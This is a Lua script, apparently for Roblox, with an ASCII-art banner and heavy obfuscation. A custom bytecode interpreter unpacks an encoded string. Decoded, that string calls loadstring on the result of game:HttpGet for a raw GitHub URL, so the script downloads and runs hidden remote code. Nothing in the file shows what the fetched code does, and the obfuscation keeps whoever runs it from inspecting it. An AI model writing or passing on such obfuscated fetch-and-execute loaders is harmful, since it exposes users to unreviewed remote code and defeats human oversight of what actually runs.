--[[

╭━━━┳━━━┳━━━┳━━━┳━━━┳━━━╮
┃╭━╮┃╭━━┫╭━╮┃╭━━┫╭━╮┃╭━━╯
┃╰━╯┃╰━━┫╰━╯┃╰━━┫╰━╯┃╰━━╮
┃╭━━┫╭━━┫╭━━┫╭━━┫╭╮╭┫╭━━╯
┃┃╱╱┃╰━━┫┃╱╱┃┃╱╱┃┃┃╰┫╰━━╮
╰╯╱╱╰━━━┻╯╱╱╰╯╱╱╰╯╰━┻━━━╯

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v68=0;while true do if (v68==0) then v19=v0(v3(v30,1,1));return "";end end else local v69=v2(v0(v30,16));if v19 then local v76=v5(v69,v19);v19=nil;return v76;else return v69;end end end);local function v20(v31,v32,v33)if v33 then local v70=(v31/(2^(v32-(1 + 0))))%((591 -(283 + 306))^(((v33-1) -(v32-(2 -1))) + (2 -1))) ;return v70-(v70%(2 -1)) ;else local v71=(371 -(349 + 20))^(v32-(692 -(630 + 61))) ;return (((v31%(v71 + v71))>=v71) and (1 + 0)) or ((2954 -(1482 + 504)) -(453 + 515)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 -0 ;local v36;local v37;while true do if (v35==(3 -2)) then return (v37 * (87 + 169)) + v36 ;end if ((0 + 0)==v35) then v36,v37=v1(v16,v18,v18 + ((415 + 48) -(66 + 33 + (621 -259))) );v18=v18 + 2 ;v35=2 -1 ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (1621 -((4308 -2865) + 174)) ;return (v41 * (3078502 + 13698714)) + (v40 * (65636 -(66 + 34))) + (v39 * 256) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=(1043 -(25 + 105)) -(263 + 649) ;local v45=(v20(v43,1709 -(523 + 1185) ,98 -78 ) * ((3 -1)^(118 -86))) + v42 ;local v46=v20(v43,93 -72 ,31);local v47=((v20(v43,79 -(601 -(292 + 262)) )==(1 + (0 -0))) and  -(1031 -(342 + 688))) or (1016 -(667 + 348)) ;if (v46==(0 -0)) then if (v45==(0 -0)) then return v47 * (0 -0) ;else local v77=0 + 0 ;while true do if (v77==(0 -0)) then v46=1 -0 ;v44=0;break;end end end elseif (v46==(7065 -5018)) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(270 + 753) ) * (v44 + (v45/((2 + 0 + 0)^52))) ;end local function v25(v48)local v49;if  not v48 then local v72=0 + 0 ;while true do if ((0 -0)==v72) then v48=v23();if (v48==0) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -((1488 -(373 + 57)) -(185 + 1 + (901 -(14 + 16)))) );v18=v18 + v48 ;local v50={};for v65=1 + 0 , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;while true do local v67=0;while true do if (v67==0) then if (v51~=(0 -0)) then else v52={};v53={};v54={};v55={v52,v53,nil,v54};v51=1 + 0 ;end if (v51~=(3 -1)) then else for v99=1,v23() do local v100=0 -0 ;local v101;local v102;while true do if (v100~=(601 -(527 + 73))) then else while true do if (v101~=(0 + 0)) then else v102=v21();if (v20(v102,1 + 0 ,1)==0) then local v119=0;local v120;local v121;local v122;local v123;local v124;while true do if (v119==0) then v120=0;v121=nil;v119=1 -0 ;end if (v119==1) then v122=nil;v123=nil;v119=1 + 1 ;end if (v119~=2) then else v124=nil;while true do if (v120==(2 + 0)) then while true do if (v121==(5 -2)) then if (v20(v123,1 + 2 ,1626 -(1022 + 601) )==1) then v124[3 + 1 ]=v57[v124[15 -11 ]];end v52[v99]=v124;break;end if (v121==1) then local v156=0 + 0 ;local v157;while true do if (v156==(770 -(167 + 603))) then v157=0;while true do if (v157~=0) then else v124={v22(),v22(),nil,nil};if (v122==(0 + 0)) then local v175=74 -(67 + 7) ;local v176;while true do if ((1985 -(680 + 1305))~=v175) then else v176=0;while true do if (v176~=0) then else v124[3]=v22();v124[4]=v22();break;end end break;end end elseif (v122==1) then v124[7 -4 ]=v23();elseif (v122==(3 -1)) then v124[2 + 1 ]=v23() -((2 + 0)^(13 + 3)) ;elseif (v122~=(2 + 1)) then else local v184=0;local v185;local v186;while true do if (v184~=1) then else while true do if (v185==(575 -(131 + 444))) then v186=0;while true do if (v186~=(0 -0)) then else v124[3 + 0 ]=v23() -(2^(29 -13)) ;v124[4]=v22();break;end end break;end end break;end if ((0 -0)~=v184) then else local v187=1004 -(745 + 259) ;while true do if (v187==1) then v184=2 -1 ;break;end if (v187==(0 + 0)) then v185=0;v186=nil;v187=1 -0 ;end end end end end v157=1 + 0 ;end if (v157~=1) then else v121=191 -(21 + 168) ;break;end end break;end end end if (0~=v121) then else v122=v20(v102,2,1 + 2 );v123=v20(v102,4,994 -(870 + 118) );v121=4 -3 ;end if (v121~=(5 -3)) then else if (v20(v123,1,1 -0 )==(1 + 0)) then v124[2]=v57[v124[2]];end if (v20(v123,6 -4 ,5 -3 )==1) then v124[336 -(78 + 255) ]=v57[v124[3]];end v121=3 + 0 ;end end break;end if (v120~=(0 -0)) then else v121=0;v122=nil;v120=73 -(32 + 40) ;end if (v120==1) then local v148=0;while true do if (v148==0) then v123=nil;v124=nil;v148=824 -(444 + 379) ;end if (v148==(1 -0)) then v120=2;break;end end end end break;end end end break;end end break;end if ((0 + 0)==v100) then local v115=0;while true do if (v115~=1) then else v100=2 -1 ;break;end if (v115==(217 -(87 + 130))) then v101=0 + 0 ;v102=nil;v115=1931 -(57 + 1873) ;end end end end end for v103=1,v23() do v53[v103-1 ]=v28();end for v105=1 + 0 ,v23() do v54[v105]=v23();end return v55;end v67=1;end if (v67==1) then if (v51==1) then v56=v23();v57={};for v107=577 -(425 + 151) ,v56 do local v108=0 -0 ;local v109;local v110;while true do if (v108==(2 -1)) then if (v109==1) then v110=v21()~=(0 + 0) ;elseif (v109==2) then v110=v24();elseif (v109==3) then v110=v25();end v57[v107]=v110;break;end if (v108~=(1683 -(720 + 963))) then else local v117=0 + 0 ;while true do if ((0 -0)~=v117) then else v109=v21();v110=nil;v117=1;end if (v117==1) then v108=1;break;end end end end end v55[1 + 2 ]=v21();v51=2;end break;end end end end local function v29(v58,v59,v60)local v61=0;local v62;local v63;local v64;while true do if (v61==1) then v64=v58[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v12("#",...) -1 ;local function v82()local v83=v62;local v84=v63;local v85=v64;local v86=v27;local v87={};local v88={};local v89={};for v94=0 -0 ,v81 do if (((1673 -(66 + 66 + 259 + 1227))==((1693 -(1120 + 549)) + (80 -49))) and (v94>=v85)) then v87[v94-v85 ]=v80[v94 + (609 -(26 + 582)) + 0 ];else v89[v94]=v80[v94 + 1 ];end end local v90=(v81-v85) + (1944 -(357 + 1586)) ;local v91;local v92;while true do local v95=0 -0 ;local v96;while true do if ((v95==0) or ((11098 -7599)==(6333 -(1230 + 558)))) then v96=0 -0 ;while true do if ((v96==(3 -2)) or ((4553 -2670)>(4504 + 90))) then if ((v92<=(2 + 0)) or ((3226 -(114 + 245))<=(460 + 1742))) then if (((7499 -3123)>=(272 + 311)) and (v92<=(0 + 0))) then local v127=0 + 0 ;local v128;local v129;local v130;local v131;local v132;while true do if ((v127==(978 -((1114 -391) + 253))) or ((3308 + 1011)>(2107 + 2356))) then v132=nil;while true do if ((930<(6041 -2830)) and (v128==(1011 -(760 + 103 + 146)))) then for v152=v129,v79 do local v153=0;local v154;while true do if (((746 -253)<=(5703 -(1518 + 848))) and (v153==0)) then v154=0 + 0 ;while true do if ((v154==(0 + 0)) or ((3454 -(759 + 537))==((3876 -(1095 + 513)) + (5833 -3478)))) then v132=v132 + (523 -(201 + 321)) ;v89[v152]=v130[v132];break;end end break;end end end break;end if (((282 + 901)>=(1772 -(385 + 829 + 383))) and ((1143 -(902 + 240))==v128)) then local v149=0 -(828 -(752 + 76)) ;while true do if ((v149==(1 + 0)) or ((96 + (2384 -(1930 + 3)))>(3433 -((2040 -(1693 + 200)) + 1434)))) then v128=1568 -(346 + 1220) ;break;end if (((2477 -1314)<(3572 -(1707 + 246))) and (v149==(1507 -(867 + 640)))) then v79=(v131 + v129) -1 ;v132=0 + 0 ;v149=2 -1 ;end end end if ((v128==(0 + 0)) or ((2418 -1749)>(3864 -(44 + 8)))) then local v150=0 -0 ;local v151;while true do if ((v150==(0 + 0)) or ((1 + 108)>(5644 -2282))) then v151=0 -0 ;while true do if ((v151==(1054 -((193 -109) + 969))) or ((279 + 636)>(3108 -1918))) then v128=1 + 0 ;break;end if (((0 -0)==v151) or ((16127 -11408)<=(1214 + 2292))) then v129=v91[2 + 0 ];v130,v131=v86(v89[v129](v13(v89,v129 + (1 -0) ,v91[(1 + 2) -0 ])));v151=3 -2 ;end end break;end end end end break;end if ((v127==(0 + 0)) or (876<((994 + 396) -808))) then local v146=0 + 0 ;while true do if (((5711 -3491)>=(3196 -2074)) and (v146==(0 + 0))) then v128=856 -(135 + 712 + 9) ;v129=nil;v146=1 + 0 ;end if (((514 + 486)<=(9042 -6458)) and (v146==((1231 -(319 + 911)) + 0))) then v127=1289 -(1087 + 201) ;break;end end end if (((519 + 123)<(11817 -7169)) and (v127==(3 -2))) then local v147=711 -(418 + 293) ;while true do if ((v147==(0 -0)) or ((1128 + 2886)>=(6121 -(1357 + 57 + 329)))) then v130=nil;v131=nil;v147=1 -0 ;end if ((v147==(1 + 0)) or ((10454 -7276)<=(1156 + (2276 -1354)))) then v127=1 + 1 + 0 ;break;end end end end elseif ((v92==((3 -2) + 0)) or ((10236 -6871)<=51)) then v89[v91[1 + 1 ]]=v60[v91[5 -2 ]];else do return;end end elseif (((2095 -(49 + 1378))<=((2347 -(74 + 524)) -(320 + 457))) and (v92<=((430 + 109) -(523 + 12)))) then if ((((1870 -(148 + 583)) -(63 + 488 + 131))<=((1868 -(541 + 606)) + 3874)) and (v92>(2 + 1))) then v89[v91[6 -4 ]]=v91[1 + 2 ];else local v137=0 + 0 ;local v138;local v139;local v140;while true do if ((v137==(0 + 0)) or ((553 + 1228)>=(10120 -5800))) then v138=0 + 0 ;v139=nil;v137=1 + 0 ;end if ((v137==(1 -0)) or ((1013 + 1549)>(30 + 3778))) then v140=nil;while true do if (((1 + 0)==v138) or ((3254 -(116 + 327))<(45 + 12))) then while true do if ((v139==(148 -(78 + 70))) or ((1013 + 3489)<=(3436 -(31 + 456)))) then v140=v91[1128 -(1089 + 37) ];v89[v140]=v89[v140](v13(v89,v140 + (3 -2) ,v79));break;end end break;end if (((781 -(145 + 636))==v138) or ((13830 -8964)<(5984 -3465))) then v139=0 -0 ;v140=nil;v138=534 -(137 + 396) ;end end break;end end end elseif ((v92>(8 -(2 + 1))) or ((29 + 573)>=(1299 + 174))) then local v141=1033 -(154 + 879) ;local v142;local v143;local v144;local v145;while true do if (((11643 -7087)>(28 + 181)) and (v141==(4 -3))) then v144=nil;v145=nil;v141=282 -(234 + 46) ;end if ((v141==(1666 -(1030 + 636))) or ((1573 -597)<120)) then v142=1243 -(1138 + 105) ;v143=nil;v141=1512 -(258 + 1253) ;end if ((v141==(114 -(70 + 42))) or ((18106 -13714)<(4835 -3678))) then while true do if ((v142==(754 -(52 + 702))) or ((18255 -13518)==((8261 -(17 + 19)) -5078))) then local v158=1865 -(683 + 1182) ;while true do if ((v158==(408 -(317 + 90))) or ((21173 -16746)<=(4586 -(1319 + 225)))) then v142=(2 -1) -0 ;break;end if (((3229 -2025)==(375 + 829)) and (v158==(0 + 0))) then v143=0 + 0 ;v144=nil;v158=2 -1 ;end end end if (((1743 + 21 + 100)>=578) and (v142==(1 -0))) then v145=nil;while true do if ((((9570 -5041) -(80 + 213))>=(4498 -(190 + 216 + 203))) and (v143==(0 + 0))) then local v167=1639 -(938 + 701) ;local v168;while true do if ((v167==(505 -(183 + 322))) or ((3538 -2141)>=(1271 + 2388))) then v168=(0 + 0) -0 ;while true do if (((1447 -(18 + 13))>=(1175 -(495 + 233))) and (1==v168)) then v143=1 + 0 ;break;end if (((188 + 3073)>(1129 -492)) and (v168==(0 + (622 -(449 + 173))))) then local v177=946 -(521 + 425) ;while true do if ((v177==1) or ((208 + 340)==((2628 -(19 + 271)) -(1498 + 445)))) then v168=1 + 0 + 0 ;break;end if ((v177==(1092 -(1001 + 91))) or ((41 + 786 + 435)==(3299 -(448 + 346)))) then v144=v91[2 -0 ];v145=v89[v91[657 -(248 + 406) ]];v177=(1573 -(1396 + 174)) -2 ;end end end end break;end end end if (((1841 -(494 + 1346))==(1 + 0 + 0)) and ((1 + 0)==v143)) then v89[v144 + (419 -(315 + 103)) ]=v145;v89[v144]=v145[v91[16 -12 ]];break;end end break;end end break;end end else v89[v91[1 + 1 ]]();end v78=v78 + 1 + 0 ;break;end if ((v96==(0 + 0 + (0 -0))) or ((527 -(142 + 145))>=(6381 -(964 + 681)))) then local v118=0 -0 ;while true do if ((v118==(2 -1)) or ((2733 -814)==(3433 -(575 + 123)))) then v96=(3 -1) -1 ;break;end if (((0 + 0)==v118) or ((5268 -1513)==((2371 + 16971) -15030))) then v91=v83[v78];v92=v91[1 -0 ];v118=1 + 0 ;end end end end break;end end end end A,B=v27(v11(v82));if  not A[1] then local v97=0;local v98;while true do if (v97==0) then v98=v58[4][v78] or "?" ;error("Script error at ["   .. v98   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end if (v61==0) then v62=v58[1];v63=v58[2];v61=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403533O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4269746368657A4E6F537465616C2F4E6F537465616C4675636B746172642F6D61696E2F46552O4E59504550465245563200083O0012013O00013O001201000100023O002006000100010003001204000300046O000100034O00035O00022O00053O000100012O00023O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end